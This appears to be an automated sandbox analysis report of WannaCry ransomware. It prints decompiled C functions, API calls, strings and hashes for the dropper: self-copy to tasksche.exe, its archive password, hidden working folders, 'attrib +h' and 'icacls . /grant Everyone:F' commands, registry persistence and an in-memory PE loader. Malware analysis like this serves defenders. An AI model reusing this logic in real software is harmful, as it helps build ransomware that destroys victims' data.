0x00407288
0x00407288
0x0040728e
0x0040728f
0x00000000
0x0040728f
0x0040727d
0x00407281
0x00000000
0x00000000
0x00000000
0x00407281
0x00407244
0x0040723b
0x00000000
0x0040723b
0x00407236
0x00000000
0x00407236
0x00000000
0x00000000
0x00000000

Strings

\, xrefs: 00407358
%s%s, xrefs: 00407389
:, xrefs: 0040736E
%s%s%s, xrefs: 004072F6

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID:
String ID: %s%s$%s%s%s$:$\
API String ID: 0-1100577047
Opcode ID: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
Instruction ID: 622825bbce38b7500016b977d00db7372d85e5c8e1565b3adbba59f792ee02a2
Opcode Fuzzy Hash: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
Instruction Fuzzy Hash: 42A12A31C082049BDB319F14CC44BEA7BA9AB01314F2445BFF895B62D1D73DBA95CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040203B Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040203B(intOrPtr* __eax, void* __edi) {
				void* _t25;
				intOrPtr* _t33;
				int _t42;
				CHAR* _t63;
				void* _t64;
				char** _t66;

				__imp____p___argv();
				if(strcmp( *( *__eax + 4), "/i") != 0 || E00401B5F(_t42) == 0) {
					L4:
					if(strrchr(_t64 - 0x20c, 0x5c) != 0) {
						 *(strrchr(_t64 - 0x20c, 0x5c)) = _t42;
					}
					SetCurrentDirectoryA(_t64 - 0x20c);
					E004010FD(1);
					 *_t66 = "WNcry@2ol7";
					_push(_t42);
					L00401DAB();
					E00401E9E();
					E00401064("attrib +h .", _t42, _t42);
					E00401064("icacls . /grant Everyone:F /T /C /Q", _t42, _t42);
					_t25 = E0040170A();
					_t74 = _t25;
					if(_t25 != 0) {
						E004012FD(_t64 - 0x6e4, _t74);
						if(E00401437(_t64 - 0x6e4, _t42, _t42, _t42) != 0) {
							 *(_t64 - 4) = _t42;
							if(E004014A6(_t64 - 0x6e4, "t.wnry", _t64 - 4) != _t42 && E004021BD(_t31,  *(_t64 - 4)) != _t42) {
								_t33 = E00402924(_t32, "TaskStart");
								_t78 = _t33 - _t42;
								if(_t33 != _t42) {
									 *_t33(_t42, _t42);
								}
							}
						}
						E0040137A(_t64 - 0x6e4, _t78);
					}
					goto L13;
				} else {
					_t63 = "tasksche.exe";
					CopyFileA(_t64 - 0x20c, _t63, _t42);
					if(GetFileAttributesA(_t63) == 0xffffffff || E00401F5D(__edi) == 0) {
						goto L4;
					} else {
						L13:
						return 0;
					}
				}
			}

0x00402040
0x00402054
0x0040208e
0x004020a3
0x004020b1
0x004020b3
0x004020bb
0x004020c3
0x004020c8
0x004020cf
0x004020d0
0x004020d5
0x004020e1
0x004020ed
0x004020f5
0x004020fa
0x004020fc
0x00402104
0x00402119
0x0040212a
0x00402134
0x0040214b
0x00402151
0x00402154
0x00402158
0x00402158
0x00402154
0x00402134
0x00402160
0x00402160
0x00000000
0x00402061
0x00402061
0x0040206f
0x0040207f
0x00000000
0x00402165
0x00402165
0x0040216b
0x0040216b
0x0040207f

APIs

__p___argv.MSVCRT(0040F538), ref: 00402040
strcmp.MSVCRT(?), ref: 0040204B
CopyFileA.KERNEL32(?,tasksche.exe), ref: 0040206F
GetFileAttributesA.KERNEL32(tasksche.exe), ref: 00402076

Part of subcall function 00401F5D: GetFullPathNameA.KERNEL32(tasksche.exe,00000208,?,00000000), ref: 00401F97

strrchr.MSVCRT(?,0000005C,?,?,00000000), ref: 0040209D
strrchr.MSVCRT(?,0000005C), ref: 004020AE
SetCurrentDirectoryA.KERNEL32(?,00000000), ref: 004020BB

Part of subcall function 00401B5F: MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
Part of subcall function 00401B5F: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
Part of subcall function 00401B5F: swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
Part of subcall function 00401B5F: GetFileAttributesW.KERNEL32(?), ref: 00401C10

Strings

t.wnry, xrefs: 00402125
TaskStart, xrefs: 00402145
tasksche.exe, xrefs: 00402061, 0040206D, 00402075
attrib +h ., xrefs: 004020DC
icacls . /grant Everyone:F /T /C /Q, xrefs: 004020E8

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: File$AttributesDirectorystrrchr$ByteCharCopyCurrentFullMultiNamePathWideWindows__p___argvstrcmpswprintf
String ID: TaskStart$attrib +h .$icacls . /grant Everyone:F /T /C /Q$t.wnry$tasksche.exe
API String ID: 1074704982-2844324180
Opcode ID: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
Instruction ID: 0f1cc1f94130967d107883c1ee7151828ebb686b55f89e1ef1b9593e139f0a32
Opcode Fuzzy Hash: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
Instruction Fuzzy Hash: 25318172500319AEDB24B7B19E89E9F376C9F10319F20057FF645F65E2DE788D488A28

Uniqueness

Uniqueness Score: -1.00%

Function 004010FD Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 100
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004010FD(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				void _v196;
				long _v216;
				void _v735;
				char _v736;
				signed int _t44;
				void* _t46;
				signed int _t55;
				signed int _t56;
				char* _t72;
				void* _t77;

				_t56 = 5;
				memcpy( &_v216, L"Software\\", _t56 << 2);
				_push(0x2d);
				_v736 = _v736 & 0;
				_v8 = _v8 & 0x00000000;
				memset( &_v735, memset( &_v196, 0, 0 << 2), 0x81 << 2);
				asm("stosw");
				asm("stosb");
				wcscat( &_v216, L"WanaCrypt0r");
				_v12 = _v12 & 0x00000000;
				_t72 = "wd";
				do {
					_push( &_v8);
					_push( &_v216);
					if(_v12 != 0) {
						_push(0x80000001);
					} else {
						_push(0x80000002);
					}
					RegCreateKeyW();
					if(_v8 != 0) {
						if(_a4 == 0) {
							_v16 = 0x207;
							_t44 = RegQueryValueExA(_v8, _t72, 0, 0,  &_v736,  &_v16);
							asm("sbb esi, esi");
							_t77 =  ~_t44 + 1;
							if(_t77 != 0) {
								SetCurrentDirectoryA( &_v736);
							}
						} else {
							GetCurrentDirectoryA(0x207,  &_v736);
							_t55 = RegSetValueExA(_v8, _t72, 0, 1,  &_v736, strlen( &_v736) + 1);
							asm("sbb esi, esi");
							_t77 =  ~_t55 + 1;
						}
						RegCloseKey(_v8);
						if(_t77 != 0) {
							_t46 = 1;
							return _t46;
						} else {
							goto L10;
						}
					}
					L10:
					_v12 = _v12 + 1;
				} while (_v12 < 2);
				return 0;
			}

0x0040110f
0x00401116
0x00401118
0x0040111c
0x00401129
0x0040113a
0x0040113c
0x0040113e
0x0040114b
0x00401151
0x00401157
0x0040115c
0x00401164
0x0040116b
0x0040116c
0x00401175
0x0040116e
0x0040116e
0x0040116e
0x0040117a
0x00401183
0x0040118c
0x004011cf
0x004011e4
0x004011ee
0x004011f0
0x004011f1
0x004011fa
0x004011fa
0x0040118e
0x0040119a
0x004011bd
0x004011c7
0x004011c9
0x004011c9
0x00401203
0x0040120b
0x00401222
0x00000000
0x00000000
0x00000000
0x00000000
0x0040120b
0x0040120d
0x0040120d
0x00401210
0x00000000

APIs

wcscat.MSVCRT(?,WanaCrypt0r,?,0000DDB6), ref: 0040114B
RegCreateKeyW.ADVAPI32(80000001,?,00000000), ref: 0040117A
GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 0040119A
strlen.MSVCRT(?), ref: 004011A7
RegSetValueExA.ADVAPI32(00000000,0040E030,00000000,00000001,?,00000001), ref: 004011BD
RegQueryValueExA.ADVAPI32(00000000,0040E030,00000000,00000000,?,?), ref: 004011E4
SetCurrentDirectoryA.KERNEL32(?), ref: 004011FA
RegCloseKey.ADVAPI32(00000000), ref: 00401203

Strings

WanaCrypt0r, xrefs: 00401145
0@, xrefs: 00401157
Software\, xrefs: 0040110A

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: CurrentDirectoryValue$CloseCreateQuerystrlenwcscat
String ID: 0@$Software\$WanaCrypt0r
API String ID: 865909632-3421300005
Opcode ID: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
Instruction ID: 752dd9e6153134350df00ddc45e524be7a8e60cbe47ba2191db59f61a0b32c4f
Opcode Fuzzy Hash: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
Instruction Fuzzy Hash: 09316232801228EBDB218B90DD09BDEBB78EB44751F1140BBE645F6190CB745E84CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401B5F Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00401B5F(intOrPtr _a4) {
				void _v202;
				short _v204;
				void _v722;
				long _v724;
				signed short _v1240;
				void _v1242;
				long _v1244;
				void* _t55;
				signed int _t65;
				void* _t72;
				long _t83;
				void* _t94;
				void* _t98;

				_t83 =  *0x40f874; // 0x0
				_v1244 = _t83;
				memset( &_v1242, 0, 0x81 << 2);
				asm("stosw");
				_v724 = _t83;
				memset( &_v722, 0, 0x81 << 2);
				asm("stosw");
				_push(0x31);
				_v204 = _t83;
				memset( &_v202, 0, 0 << 2);
				asm("stosw");
				MultiByteToWideChar(0, 0, 0x40f8ac, 0xffffffff,  &_v204, 0x63);
				GetWindowsDirectoryW( &_v1244, 0x104);
				_v1240 = _v1240 & 0x00000000;
				swprintf( &_v724, L"%s\\ProgramData",  &_v1244);
				_t98 = _t94 + 0x30;
				if(GetFileAttributesW( &_v724) == 0xffffffff) {
					L3:
					swprintf( &_v724, L"%s\\Intel",  &_v1244);
					if(E00401AF6( &_v724,  &_v204, _a4) != 0 || E00401AF6( &_v1244,  &_v204, _a4) != 0) {
						L2:
						_t55 = 1;
						return _t55;
					} else {
						GetTempPathW(0x104,  &_v724);
						if(wcsrchr( &_v724, 0x5c) != 0) {
							 *(wcsrchr( &_v724, 0x5c)) =  *_t69 & 0x00000000;
						}
						_t65 = E00401AF6( &_v724,  &_v204, _a4);
						asm("sbb eax, eax");
						return  ~( ~_t65);
					}
				}
				_t72 = E00401AF6( &_v724,  &_v204, _a4);
				_t98 = _t98 + 0xc;
				if(_t72 == 0) {
					goto L3;
				}
				goto L2;
			}

0x00401b68
0x00401b80
0x00401b87
0x00401b89
0x00401b95
0x00401b9c
0x00401b9e
0x00401ba0
0x00401bab
0x00401bb4
0x00401bb6
0x00401bca
0x00401bdd
0x00401be9
0x00401c04
0x00401c06
0x00401c19
0x00401c40
0x00401c53
0x00401c70
0x00401c38
0x00401c3a
0x00000000
0x00401c8f
0x00401c97
0x00401cb2
0x00401cbf
0x00401cc4
0x00401cd6
0x00401ce0
0x00000000
0x00401ce2
0x00401c70
0x00401c2c
0x00401c31
0x00401c36
0x00000000
0x00000000
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
GetFileAttributesW.KERNEL32(?), ref: 00401C10
swprintf.MSVCRT(?,%s\Intel,?), ref: 00401C53
GetTempPathW.KERNEL32(00000104,?), ref: 00401C97
wcsrchr.MSVCRT(?,0000005C), ref: 00401CAC
wcsrchr.MSVCRT(?,0000005C), ref: 00401CBD

Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21

Strings

%s\Intel, xrefs: 00401C4D
%s\ProgramData, xrefs: 00401BFE

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: Directory$CreateCurrentswprintfwcsrchr$AttributesByteCharFileMultiPathTempWideWindows
String ID: %s\Intel$%s\ProgramData
API String ID: 3806094219-198707228
Opcode ID: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
Instruction ID: 4ac525b1174630586dc3f01422198d44c3eaba501bd80531e66e43f198221a67
Opcode Fuzzy Hash: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
Instruction Fuzzy Hash: 2C41447294021DAAEF609BA0DD45FDA777CAF04310F1045BBE608F71E0EA74DA888F59

Uniqueness

Uniqueness Score: -1.00%

Function 004021E9 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 233
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004021E9(void* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32) {
				signed int _v8;
				intOrPtr _v40;
				char _v44;
				void* _t82;
				struct HINSTANCE__* _t83;
				intOrPtr* _t84;
				intOrPtr _t89;
				void* _t91;
				void* _t104;
				void _t107;
				intOrPtr _t116;
				intOrPtr _t124;
				signed int _t125;
				signed char _t126;
				intOrPtr _t127;
				signed int _t134;
				intOrPtr* _t145;
				signed int _t146;
				intOrPtr* _t151;
				intOrPtr _t152;
				short* _t153;
				signed int _t155;
				void* _t156;
				intOrPtr _t157;
				void* _t158;
				void* _t159;
				void* _t160;

				_v8 = _v8 & 0x00000000;
				_t3 =  &_a8; // 0x40213f
				if(E00402457( *_t3, 0x40) == 0) {
					L37:
					return 0;
				}
				_t153 = _a4;
				if( *_t153 == 0x5a4d) {
					if(E00402457(_a8,  *((intOrPtr*)(_t153 + 0x3c)) + 0xf8) == 0) {
						goto L37;
					}
					_t151 =  *((intOrPtr*)(_t153 + 0x3c)) + _t153;
					if( *_t151 != 0x4550 ||  *((short*)(_t151 + 4)) != 0x14c) {
						goto L2;
					} else {
						_t9 = _t151 + 0x38; // 0x68004021
						_t126 =  *_t9;
						if((_t126 & 0x00000001) != 0) {
							goto L2;
						}
						_t12 = _t151 + 0x14; // 0x4080e415
						_t13 = _t151 + 6; // 0x4080e0
						_t146 =  *_t13 & 0x0000ffff;
						_t82 = ( *_t12 & 0x0000ffff) + _t151 + 0x18;
						if(_t146 <= 0) {
							L16:
							_t83 = GetModuleHandleA("kernel32.dll");
							if(_t83 == 0) {
								goto L37;
							}
							_t84 = _a24(_t83, "GetNativeSystemInfo", 0);
							_t159 = _t158 + 0xc;
							if(_t84 == 0) {
								goto L37;
							}
							 *_t84( &_v44);
							_t86 = _v40;
							_t23 = _t151 + 0x50; // 0xec8b55c3
							_t25 = _t86 - 1; // 0xec8b55c2
							_t27 = _t86 - 1; // -1
							_t134 =  !_t27;
							_t155 =  *_t23 + _t25 & _t134;
							if(_t155 != (_v40 + _v8 - 0x00000001 & _t134)) {
								goto L2;
							}
							_t31 = _t151 + 0x34; // 0x85680040
							_t89 = _a12( *_t31, _t155, 0x3000, 4, _a32);
							_t127 = _t89;
							_t160 = _t159 + 0x14;
							if(_t127 != 0) {
								L21:
								_t91 = HeapAlloc(GetProcessHeap(), 8, 0x3c);
								_t156 = _t91;
								if(_t156 != 0) {
									 *((intOrPtr*)(_t156 + 4)) = _t127;
									_t38 = _t151 + 0x16; // 0xc3004080
									 *(_t156 + 0x14) =  *_t38 >> 0x0000000d & 0x00000001;
									 *((intOrPtr*)(_t156 + 0x1c)) = _a12;
									 *((intOrPtr*)(_t156 + 0x20)) = _a16;
									 *((intOrPtr*)(_t156 + 0x24)) = _a20;
									 *((intOrPtr*)(_t156 + 0x28)) = _a24;
									 *((intOrPtr*)(_t156 + 0x2c)) = _a28;
									 *((intOrPtr*)(_t156 + 0x30)) = _a32;
									 *((intOrPtr*)(_t156 + 0x38)) = _v40;
									_t54 = _t151 + 0x54; // 0x8328ec83
									if(E00402457(_a8,  *_t54) == 0) {
										L36:
										E004029CC(_t156);
										goto L37;
									}
									_t57 = _t151 + 0x54; // 0x8328ec83
									_t104 = _a12(_t127,  *_t57, 0x1000, 4, _a32);
									_t59 = _t151 + 0x54; // 0x8328ec83
									_a32 = _t104;
									memcpy(_t104, _a4,  *_t59);
									_t107 =  *((intOrPtr*)(_a4 + 0x3c)) + _a32;
									 *_t156 = _t107;
									 *((intOrPtr*)(_t107 + 0x34)) = _t127;
									if(E00402470(_a4, _a8, _t151, _t156) == 0) {
										goto L36;
									}
									_t68 = _t151 + 0x34; // 0x85680040
									_t111 =  *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68;
									if( *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68) {
										_t152 = 1;
										 *((intOrPtr*)(_t156 + 0x18)) = _t152;
									} else {
										 *((intOrPtr*)(_t156 + 0x18)) = E00402758(_t156, _t111);
										_t152 = 1;
									}
									if(E004027DF(_t156) != 0 && E0040254B(_t156) != 0 && E0040271D(_t156) != 0) {
										_t116 =  *((intOrPtr*)( *_t156 + 0x28));
										if(_t116 == 0) {
											 *((intOrPtr*)(_t156 + 0x34)) = 0;
											L41:
											return _t156;
										}
										if( *(_t156 + 0x14) == 0) {
											 *((intOrPtr*)(_t156 + 0x34)) = _t116 + _t127;
											goto L41;
										}
										_push(0);
										_push(_t152);
										_push(_t127);
										if( *((intOrPtr*)(_t116 + _t127))() != 0) {
											 *((intOrPtr*)(_t156 + 0x10)) = _t152;
											goto L41;
										}
										SetLastError(0x45a);
									}
									goto L36;
								}
								_a16(_t127, _t91, 0x8000, _a32);
								L23:
								SetLastError(0xe);
								L3:
								goto L37;
							}
							_t127 = _a12(_t89, _t155, 0x3000, 4, _a32);
							_t160 = _t160 + 0x14;
							if(_t127 == 0) {
								goto L23;
							}
							goto L21;
						}
						_t145 = _t82 + 0xc;
						do {
							_t157 =  *((intOrPtr*)(_t145 + 4));
							_t124 =  *_t145;
							if(_t157 != 0) {
								_t125 = _t124 + _t157;
							} else {
								_t125 = _t124 + _t126;
							}
							if(_t125 > _v8) {
								_v8 = _t125;
							}
							_t145 = _t145 + 0x28;
							_t146 = _t146 - 1;
						} while (_t146 != 0);
						goto L16;
					}
				}
				L2:
				SetLastError(0xc1);
				goto L3;
			}

0x004021ef
0x004021f8
0x00402204
0x0040243d
0x00000000
0x0040243d
0x0040220a
0x00402212
0x00402239
0x00000000
0x00000000
0x00402242
0x0040224a
0x00000000
0x00402254
0x00402254
0x00402254
0x0040225a
0x00000000
0x00000000
0x0040225c
0x00402260
0x00402260
0x00402266
0x0040226a
0x0040228c
0x00402291
0x00402299
0x00000000
0x00000000
0x004022a7
0x004022aa
0x004022af
0x00000000
0x00000000
0x004022b9
0x004022bb
0x004022be
0x004022c1
0x004022c8
0x004022cb
0x004022d1
0x004022d7
0x00000000
0x00000000
0x004022e8
0x004022eb
0x004022ee
0x004022f0
0x004022f5
0x0040230f
0x0040231a
0x00402320
0x00402324
0x0040233d
0x00402340
0x0040234a
0x00402350
0x00402356
0x0040235c
0x00402362
0x00402368
0x0040236e
0x00402374
0x00402377
0x00402386
0x00402436
0x00402437
0x00000000
0x0040243c
0x00402396
0x0040239a
0x0040239d
0x004023a0
0x004023a7
0x004023ba
0x004023bc
0x004023bf
0x004023cc
0x00000000
0x00000000
0x004023d3
0x004023d3
0x004023d6
0x004023eb
0x004023ec
0x004023d8
0x004023e0
0x004023e6
0x004023e6
0x004023f8
0x00402414
0x00402419
0x0040244d
0x00402450
0x00000000
0x00402450
0x0040241e
0x00402448
0x00000000
0x00402448
0x00402420
0x00402421
0x00402424
0x00402429
0x00402441
0x00000000
0x00402441
0x00402430
0x00402430
0x00000000
0x004023f8
0x00402330
0x00402336
0x00402219
0x00402219
0x00000000
0x00402219
0x00402306
0x00402308
0x0040230d
0x00000000
0x00000000
0x00000000
0x0040230d
0x0040226c
0x0040226f
0x0040226f
0x00402272
0x00402276
0x0040227c
0x00402278
0x00402278
0x00402278
0x00402281
0x00402283
0x00402283
0x00402286
0x00402289
0x00402289
0x00000000
0x0040226f
0x0040224a
0x00402214
0x00402219
0x00000000

APIs

Part of subcall function 00402457: SetLastError.KERNEL32(0000000D,00402200,?!@,00000040,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402463

SetLastError.KERNEL32(000000C1,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402219
GetModuleHandleA.KERNEL32(kernel32.dll,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402291
GetProcessHeap.KERNEL32(00000008,0000003C,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2), ref: 00402313
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 0040231A
memcpy.MSVCRT(00000000,?,8328EC83,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3), ref: 004023A7

Part of subcall function 00402470: memset.MSVCRT(?,00000000,?), ref: 004024D5

SetLastError.KERNEL32(0000045A), ref: 00402430

Strings

GetNativeSystemInfo, xrefs: 004022A1
?!@, xrefs: 004021F8
kernel32.dll, xrefs: 0040228C

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ErrorLast$Heap$AllocHandleModuleProcessmemcpymemset
String ID: ?!@$GetNativeSystemInfo$kernel32.dll
API String ID: 1900561814-3657104962
Opcode ID: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
Instruction ID: 3b750285519b5b92c664dbe57bf04ddc7e4262fbacbc213f0015b22f99412f1c
Opcode Fuzzy Hash: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
Instruction Fuzzy Hash: 0A81AD71A01602AFDB209FA5CE49AAB77E4BF08314F10443EF945E76D1D7B8E851CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401AF6 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00401AF6(WCHAR* _a4, WCHAR* _a8, wchar_t* _a12) {
				void* _t15;
				WCHAR* _t17;

				CreateDirectoryW(_a4, 0);
				if(SetCurrentDirectoryW(_a4) == 0) {
					L2:
					return 0;
				}
				_t17 = _a8;
				CreateDirectoryW(_t17, 0);
				if(SetCurrentDirectoryW(_t17) != 0) {
					SetFileAttributesW(_t17, GetFileAttributesW(_t17) | 0x00000006);
					if(_a12 != 0) {
						_push(_t17);
						swprintf(_a12, L"%s\\%s", _a4);
					}
					_t15 = 1;
					return _t15;
				}
				goto L2;
			}

0x00401b07
0x00401b16
0x00401b27
0x00000000
0x00401b27
0x00401b18
0x00401b1e
0x00401b25
0x00401b36
0x00401b40
0x00401b42
0x00401b4e
0x00401b54
0x00401b59
0x00000000
0x00401b59
0x00000000

APIs

CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
GetFileAttributesW.KERNEL32(?), ref: 00401B2C
SetFileAttributesW.KERNEL32(?,00000000), ref: 00401B36
swprintf.MSVCRT(?,%s\%s,?,?), ref: 00401B4E

Strings

%s\%s, xrefs: 00401B46

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: Directory$AttributesCreateCurrentFile$swprintf
String ID: %s\%s
API String ID: 1036847564-4073750446
Opcode ID: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
Instruction ID: 4a0a9b6f0974b2b783bf1fd4f993800d593798a72c4fd06372b86497b3864b36
Opcode Fuzzy Hash: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
Instruction Fuzzy Hash: 99F06271200208BBEB103F65DE44F9B3B2CEB457A5F015832FA46B61A1DB75A855CAB8

Uniqueness

Uniqueness Score: -1.00%

Function 00401064 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63
processsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00401064(CHAR* _a4, long _a8, DWORD* _a12) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				signed int _t32;
				intOrPtr _t37;

				_t32 = 0x10;
				_v88.cb = 0x44;
				memset( &(_v88.lpReserved), 0, _t32 << 2);
				_v20.hProcess = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t37 = 1;
				_v88.wShowWindow = 0;
				_v88.dwFlags = _t37;
				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20) == 0) {
					return 0;
				}
				if(_a8 != 0) {
					if(WaitForSingleObject(_v20.hProcess, _a8) != 0) {
						TerminateProcess(_v20.hProcess, 0xffffffff);
					}
					if(_a12 != 0) {
						GetExitCodeProcess(_v20.hProcess, _a12);
					}
				}
				CloseHandle(_v20);
				CloseHandle(_v20.hThread);
				return _t37;
			}

0x00401070
0x00401074
0x0040107d
0x00401082
0x00401085
0x00401086
0x00401087
0x0040108d
0x0040108e
0x004010a1
0x004010b0
0x00000000
0x004010f7
0x004010b5
0x004010c5
0x004010cc
0x004010cc
0x004010d5
0x004010dd
0x004010dd
0x004010d5
0x004010ec
0x004010f1
0x00000000

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 004010A8
WaitForSingleObject.KERNEL32(?,?), ref: 004010BD
TerminateProcess.KERNEL32(?,000000FF), ref: 004010CC
GetExitCodeProcess.KERNEL32(?,?), ref: 004010DD
CloseHandle.KERNEL32(?), ref: 004010EC
CloseHandle.KERNEL32(?), ref: 004010F1

Strings

D, xrefs: 00401074

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
String ID: D
API String ID: 786732093-2746444292
Opcode ID: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
